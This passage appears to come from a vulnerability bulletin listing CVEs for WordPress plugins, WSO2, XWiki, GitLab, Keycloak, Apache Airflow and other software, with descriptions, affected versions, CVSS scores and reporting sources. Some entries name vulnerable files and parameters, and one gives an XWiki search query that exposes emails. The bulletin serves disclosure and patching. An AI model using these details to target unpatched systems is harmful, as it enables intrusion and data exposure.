wordpress — wordpress The Slider WordPress plugin before 3.5.12 does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected 2023-12-18 6.5 CVE-2023-6077
contact@wpscan.com
wordpress — wordpress The Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘et_pb_text’ shortcode in all versions up to, and including, 4.23.1 due to insufficient input sanitization and output escaping on user supplied custom field data. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-23 6.4 CVE-2023-6744
security@wordfence.com
security@wordfence.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Popup Maker Popup Maker – Popup for opt-ins, lead gen, & more. This issue affects Popup Maker – Popup for opt-ins, lead gen, & more: from n/a through 1.17.1. 2023-12-20 5.3 CVE-2022-47597
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in File Manager by Bit Form Team File Manager – 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager. This issue affects File Manager – 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager: from n/a through 5.2.7. 2023-12-20 5.5 CVE-2022-47599
audit@patchstack.com
wordpress — wordpress Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Hal Gatewood Dashicons + Custom Post Types. This issue affects Dashicons + Custom Post Types: from n/a through 1.0.2. 2023-12-21 5.4 CVE-2023-22674
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Smackcoders Export All Posts, Products, Orders, Refunds & Users. This issue affects Export All Posts, Products, Orders, Refunds & Users: from n/a through 2.4.1. 2023-12-21 5.9 CVE-2023-2487
audit@patchstack.com
wordpress — wordpress Missing Authorization vulnerability in GamiPress GamiPress – The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress. This issue affects GamiPress – The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress: from n/a through 2.5.6. 2023-12-19 5.4 CVE-2023-25715
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Winwar Media WordPress Email Marketing Plugin – WP Email Capture. This issue affects WordPress Email Marketing Plugin – WP Email Capture: from n/a through 3.10. 2023-12-21 5.3 CVE-2023-28421
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 1.15.78. 2023-12-21 5.4 CVE-2023-32747
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in MarketingFire Editorial Calendar. This issue affects Editorial Calendar: from n/a through 3.7.12. 2023-12-20 5.4 CVE-2023-36520
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in Jordy Meow Photo Engine (Media Organizer & Lightroom). This issue affects Photo Engine (Media Organizer & Lightroom): from n/a through 6.2.5. 2023-12-20 5.4 CVE-2023-38513
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WP Sunshine Sunshine Photo Cart: Free Client Galleries for Photographers. This issue affects Sunshine Photo Cart: Free Client Galleries for Photographers: from n/a before 3.0.0. 2023-12-20 5.3 CVE-2023-41796
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina). This issue affects Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina): from n/a through 6.4.5. 2023-12-19 5.3 CVE-2023-44982
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Aruba.It Aruba HiSpeed Cache. This issue affects Aruba HiSpeed Cache: from n/a through 2.0.6. 2023-12-19 5.3 CVE-2023-44983
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in A WP Life Event Monster – Event Management, Tickets Booking, Upcoming Event allows Stored XSS. This issue affects Event Monster – Event Management, Tickets Booking, Upcoming Event: from n/a through 1.3.2. 2023-12-21 5.9 CVE-2023-47525
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Sajjad Hossain Sagor WP Edit Username allows Stored XSS. This issue affects WP Edit Username: from n/a through 1.0.5. 2023-12-21 5.9 CVE-2023-47527
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Till Krüss Email Address Encoder allows Stored XSS. This issue affects Email Address Encoder: from n/a through 1.0.22. 2023-12-15 5.4 CVE-2023-48765
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Kulwant Nagi Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates. This issue affects Affiliate Booster – Pros & Cons, Notice, and CTA Blocks for Affiliates: from n/a through 3.0.5. 2023-12-18 5.4 CVE-2023-49148
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in formzu Inc. Formzu WP allows Stored XSS. This issue affects Formzu WP: from n/a through 1.6.6. 2023-12-15 5.4 CVE-2023-49160
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress. This issue affects BigCommerce For WordPress: from n/a through 5.0.6. 2023-12-21 5.3 CVE-2023-49162
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Real Big Plugins Client Dash allows Stored XSS. This issue affects Client Dash: from n/a through 2.2.1. 2023-12-15 5.4 CVE-2023-49165
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS. This issue affects Ads by datafeedr.Com: from n/a through 1.2.0. 2023-12-15 5.4 CVE-2023-49169
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS. This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5. 2023-12-15 5.4 CVE-2023-49174
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Kreativo Pro KP Fastest Tawk.To Chat allows Stored XSS. This issue affects KP Fastest Tawk.To Chat: from n/a through 1.1.1. 2023-12-15 5.4 CVE-2023-49175
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in N.O.U.S. Open Useful and Simple Event post allows Stored XSS. This issue affects Event post: from n/a through 5.8.6. 2023-12-15 5.4 CVE-2023-49179
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WP Event Manager WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce allows Stored XSS. This issue affects WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce: from n/a through 3.1.40. 2023-12-15 5.4 CVE-2023-49181
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WPDeveloper Parallax Slider Block allows Stored XSS. This issue affects Parallax Slider Block: from n/a through 1.2.4. 2023-12-15 5.4 CVE-2023-49184
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WebFactory Ltd Guest Author allows Stored XSS. This issue affects Guest Author: from n/a through 2.3. 2023-12-15 5.4 CVE-2023-49747
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in AppMySite AppMySite – Create an app with the Best Mobile App Builder. This issue affects AppMySite – Create an app with the Best Mobile App Builder: from n/a through 3.11.0. 2023-12-21 5.3 CVE-2023-49762
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus. This issue affects WP Photo Album Plus: from n/a through 8.5.02.005. 2023-12-19 5.3 CVE-2023-49812
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in LiveChat LiveChat – WP live chat plugin for WordPress. This issue affects LiveChat – WP live chat plugin for WordPress: from n/a through 4.5.15. 2023-12-18 5.4 CVE-2023-49821
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in BoldThemes Bold Page Builder allows Stored XSS. This issue affects Bold Page Builder: from n/a through 4.6.1. 2023-12-15 5.4 CVE-2023-49823
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in AB-WP Simple Counter allows Stored XSS. This issue affects Simple Counter: from n/a through 1.0.2. 2023-12-21 5.9 CVE-2023-50377
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Freshlight Lab Menu Image, Icons made easy allows Stored XSS. This issue affects Menu Image, Icons made easy: from n/a through 3.10. 2023-12-21 5.9 CVE-2023-50826
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Accredible Accredible Certificates & Open Badges allows Stored XSS. This issue affects Accredible Certificates & Open Badges: from n/a through 1.4.8. 2023-12-21 5.9 CVE-2023-50827
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in David Vongries Ultimate Dashboard – Custom WordPress Dashboard allows Stored XSS. This issue affects Ultimate Dashboard – Custom WordPress Dashboard: from n/a through 3.7.11. 2023-12-21 5.9 CVE-2023-50828
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Aerin Loan Repayment Calculator and Application Form allows Stored XSS. This issue affects Loan Repayment Calculator and Application Form: from n/a through 2.9.3. 2023-12-21 5.9 CVE-2023-50829
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Seosbg Seos Contact Form allows Stored XSS. This issue affects Seos Contact Form: from n/a through 1.8.0. 2023-12-21 5.9 CVE-2023-50830
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Mondula GmbH Multi Step Form allows Stored XSS. This issue affects Multi Step Form: from n/a through 1.7.13. 2023-12-21 5.9 CVE-2023-50832
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Praveen Goswami Advanced Category Template. This issue affects Advanced Category Template: from n/a through 0.1. 2023-12-19 5.4 CVE-2023-50835
audit@patchstack.com
wordpress — wordpress The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘ihrss-gallery’ shortcode in versions up to, and including, 13.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-19 5.4 CVE-2023-5413
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Jquery news ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via ‘jquery-news-ticker’ shortcode in versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-19 5.4 CVE-2023-5432
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn’t restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site’s code 2023-12-18 5.3 CVE-2023-6065
contact@wpscan.com
contact@wpscan.com
wordpress — wordpress The WP Shortcodes Plugin – Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘su_button’, ‘su_members’, and ‘su_tabs’ shortcodes in all versions up to, and including, 7.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-19 5.4 CVE-2023-6488
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in XWP Stream. This issue affects Stream: from n/a through 3.9.2. 2023-12-19 4.3 CVE-2022-43450
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in weDevs Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy. This issue affects Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.19. 2023-12-19 4.4 CVE-2023-34382
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Parcel Pro. This issue affects Parcel Pro: from n/a through 1.6.11. 2023-12-19 4.7 CVE-2023-46624
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS. This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2. 2023-12-15 4.8 CVE-2023-49180
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS. This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 1.4. 2023-12-15 4.8 CVE-2023-49188
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin – GetSocial.Io allows Stored XSS. This issue affects Social Share Buttons & Analytics Plugin – GetSocial.Io: from n/a through 4.3.12. 2023-12-15 4.8 CVE-2023-49189
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS. This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6. 2023-12-15 4.8 CVE-2023-49190
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS. This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2. 2023-12-15 4.8 CVE-2023-49191
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Stored XSS. This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24. 2023-12-15 4.8 CVE-2023-49767
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Themeum Tutor LMS – eLearning and online course solution allows Stored XSS. This issue affects Tutor LMS – eLearning and online course solution: from n/a through 2.2.4. 2023-12-15 4.8 CVE-2023-49829
audit@patchstack.com
wordpress — wordpress The Autocomplete Location field Contact Form 7 WordPress plugin before 3.0, autocomplete-location-field-contact-form-7-pro WordPress plugin before 2.0 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2023-12-18 4.8 CVE-2023-5005
contact@wpscan.com
wordpress — wordpress The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin’s settings, which may include sensitive information such as Cloudflare API tokens. 2023-12-18 4.3 CVE-2023-6289
contact@wpscan.com
wordpress — wordpress
 		 Authorization Bypass Through User-Controlled Key vulnerability in Blaz K. Rate my Post – WP Rating System. This issue affects Rate my Post – WP Rating System: from n/a through 3.4.1. 2023-12-21 4.3 CVE-2023-49765
audit@patchstack.com
wso2 — api_manager Due to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response. 2023-12-15 5.3 CVE-2023-6839
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — api_manager/iot_server Multiple WSO2 products have been identified as vulnerable due to lack of server-side input validation in the Forum feature, API rating could be manipulated. 2023-12-15 4.3 CVE-2023-6835
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — multiple_products Reflected XSS vulnerability can be exploited by tampering a request parameter in Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests. 2023-12-15 6.1 CVE-2023-6838
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — multiple_products Multiple WSO2 products have been identified as vulnerable due to improper output encoding, a Stored Cross Site Scripting (XSS) attack can be carried out by an attacker injecting a malicious payload into the Registry feature of the Management Console. 2023-12-18 4.8 CVE-2023-6911
ed10eef1-636d-4fbe-9993-6890dfa878f8
xwiki — xwiki XWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki’s regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability. 2023-12-15 5.3 CVE-2023-50720
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
yiisoft — yii2-authclient yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth1/2 `state` and OpenID Connect `nonce` is vulnerable for a `timing attack` since it is compared via regular string comparison (instead of `Yii::$app->getSecurity()->compareString()`). Version 2.2.15 contains a patch for the issue. No known workarounds are available. 2023-12-22 6.1 CVE-2023-50708
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
yiisoft — yii2-authclient yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth2 PKCE implementation is vulnerable in 2 ways. First, the `authCodeVerifier` should be removed after usage (similar to `authState`). Second, there is a risk for a `downgrade attack` if PKCE is being relied on for CSRF protection. Version 2.2.15 contains a patch for the issue. No known workarounds are available. 2023-12-22 6.8 CVE-2023-50714
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction. 2023-12-15 3.5 CVE-2023-48608
psirt@adobe.com
automad — automad
 		 A vulnerability was found in automad up to 1.10.9 and classified as problematic. Affected by this issue is some unknown functionality of the file packagesstandardtemplatespost.php of the component Setting Handler. The manipulation of the argument sitename leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 2.4 CVE-2023-7035
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — faculty_management_system A vulnerability, which was classified as problematic, has been found in code-projects Faculty Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/pages/yearlevel.php. The manipulation of the argument Year Level/Section leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248744. 2023-12-22 3.5 CVE-2023-7057
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — faculty_management_system A vulnerability classified as problematic was found in code-projects Faculty Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/pages/subjects.php. The manipulation of the argument Description/Units leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248743. 2023-12-22 2.4 CVE-2023-7056
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — point_of_sales_and_inventory_management_system A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /main/checkout.php. The manipulation of the argument pt leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248846 is the identifier assigned to this vulnerability. 2023-12-22 3.5 CVE-2023-7075
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
enterprise_server — enterprise_server A race condition in GitHub Enterprise Server allowed an existing admin to maintain permissions on transferred repositories by making a GraphQL mutation to alter repository permissions during the transfer. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-21 3.9 CVE-2023-6690
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
enterprise_server — enterprise_server An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be read with an improperly scoped token. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1.  2023-12-21 2.7 CVE-2023-51380
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
gallagher — controller_6000 Sensitive information uncleared after debug/power state transition in the Controller 6000 could be abused by an attacker with knowledge of the Controller’s default diagnostic password and physical access to the Controller to view its configuration through the diagnostic web pages. This issue affects: Gallagher Controller 6000 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), v8.60 or earlier. 2023-12-18 2.4 CVE-2023-41967
disclosures@gallagher.com
gallagher — multiple_products Improper input validation of a large HTTP request in the Controller 6000 and Controller 7000 optional diagnostic web interface (Port 80) can be used to perform a Denial of Service of the diagnostic web interface. This issue affects: Gallagher Controller 6000 and 7000 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior. 2023-12-18 3.1 CVE-2023-22439
disclosures@gallagher.com
gitlab — gitlab An issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they’re not a member of. 2023-12-15 3.5 CVE-2023-3511
cve@gitlab.com
cve@gitlab.com
keycloak — keycloak Keycloak’s device authorization grant does not correctly validate the device code and client ID. An attacker client could abuse the missing validation to spoof a client consent request and trick an authorization admin into granting consent to a malicious OAuth client or possible unauthorized access to an existing OAuth client. 2023-12-21 3.5 CVE-2023-2585
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
libssh — libssh A flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection. 2023-12-19 3.7 CVE-2023-6918
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
nautobot — nautobot Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. When submitting a Job to run via a Job Button, only the model-level `extras.run_job` permission is checked (i.e., does the user have permission to run Jobs in general). Object-level permissions (i.e., does the user have permission to run this specific Job?) are not enforced by the URL/view used in this case. A user with permissions to run even a single Job can actually run all configured JobButton Jobs. Fix will be available in Nautobot 1.6.8 and 2.1.0 2023-12-22 3.5 CVE-2023-51649
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud — security-advisories Nextcloud/Cloud is a calendar app for Nextcloud. An attacker can gain access to stacktrace and internal paths of the server when generating an exception while editing a calendar appointment. It is recommended that the Nextcloud Calendar app is upgraded to 4.5.3 2023-12-22 3.5 CVE-2023-48308
security-advisories@github.com
security-advisories@github.com
phpgurukul — online_notes_sharing_system A vulnerability has been found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file user/profile.php. The manipulation of the argument name/email leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248737 was assigned to this vulnerability. 2023-12-21 3.5 CVE-2023-7050
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/signup.php. The manipulation leads to weak password requirements. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248740. 2023-12-22 3.1 CVE-2023-7053
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
slawkens — myaac A vulnerability was found in slawkens MyAAC up to 0.8.13. It has been declared as problematic. This vulnerability affects unknown code of the file system/pages/bugtracker.php. The manipulation of the argument bug[2][‘subject’]/bug[2][‘text’]/report[‘subject’] leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.14 is able to address this issue. The name of the patch is 83a91ec540072d319dd338abff45f8d5ebf48190. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248848. 2023-12-22 3.5 CVE-2023-7076
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — online_student_management_system A vulnerability has been found in SourceCodester Online Student Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file edit-student-detail.php. The manipulation of the argument notmsg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248377 was assigned to this vulnerability. 2023-12-19 2.4 CVE-2023-6945
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — school_visitor_log_e-book A vulnerability was found in SourceCodester School Visitor Log e-Book 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file log-book.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248750 is the identifier assigned to this vulnerability. 2023-12-22 3.5 CVE-2023-7059
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
w3c — online-spellchecker-py A vulnerability was found in w3c online-spellchecker-py up to 20140130. It has been rated as problematic. This issue affects some unknown processing of the file spellchecker. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of the patch is d6c21fd8187c5db2a50425ff80694149e75d722e. It is recommended to apply a patch to fix this issue. The identifier VDB-248849 was assigned to this vulnerability. 2023-12-23 3.1 CVE-2014-125108
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
wordpress — wordpress Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Ricard Torres Thumbs Rating. This issue affects Thumbs Rating: from n/a through 5.0.0. 2023-12-19 3.7 CVE-2022-45809
audit@patchstack.com
wordpress — wordpress
 		 Authorization Bypass Through User-Controlled Key vulnerability in gVectors Team Comments – wpDiscuz. This issue affects Comments – wpDiscuz: from n/a through 7.6.3. 2023-12-20 2.7 CVE-2023-46311
audit@patchstack.com

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
apache — airflow Apache Airflow, versions 2.6.0 through 2.7.3 has a stored XSS vulnerability that allows a DAG author to add an unbounded and not-sanitized javascript in the parameter description field of the DAG. This Javascript can be executed on the client side of any of the user who looks at the tasks in the browser sandbox. While this issue does not allow to exit the browser sandbox or manipulation of the server-side data – more than the DAG author already has, it allows to modify what the user looking at the DAG details sees in the browser – which opens up all kinds of possibilities of misleading other users. Users of Apache Airflow are recommended to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability 2023-12-21 not yet calculated CVE-2023-47265
security@apache.org
security@apache.org
security@apache.org
apache — airflow Apache Airflow, in versions prior to 2.8.0, contains a security vulnerability that allows an authenticated user with limited access to some DAGs, to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus, enabling the user to clear DAGs they shouldn’t. This is a missing fix for CVE-2023-42792 in Apache Airflow 2.7.2  Users of Apache Airflow are strongly advised to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability. 2023-12-21 not yet calculated CVE-2023-48291
security@apache.org
security@apache.org
security@apache.org
apache — airflow Apache Airflow, version 2.7.0 through 2.7.3, has a vulnerability that allows an attacker to trigger a DAG in a GET request without CSRF validation. As a result, it was possible for a malicious website opened in the same browser – by the user who also had Airflow UI opened – to trigger the execution of DAGs without the user’s consent. Users are advised to upgrade to version 2.8.0 or later which is not affected 2023-12-21 not yet calculated CVE-2023-49920
security@apache.org
security@apache.org
security@apache.org
apache — iotdb Deserialization of Untrusted Data vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 0.13.0 through 0.13.4. Users are recommended to upgrade to version 1.2.2, which fixes the issue. 2023-12-21 not yet calculated CVE-2023-51656
security@apache.org
security@apache.org
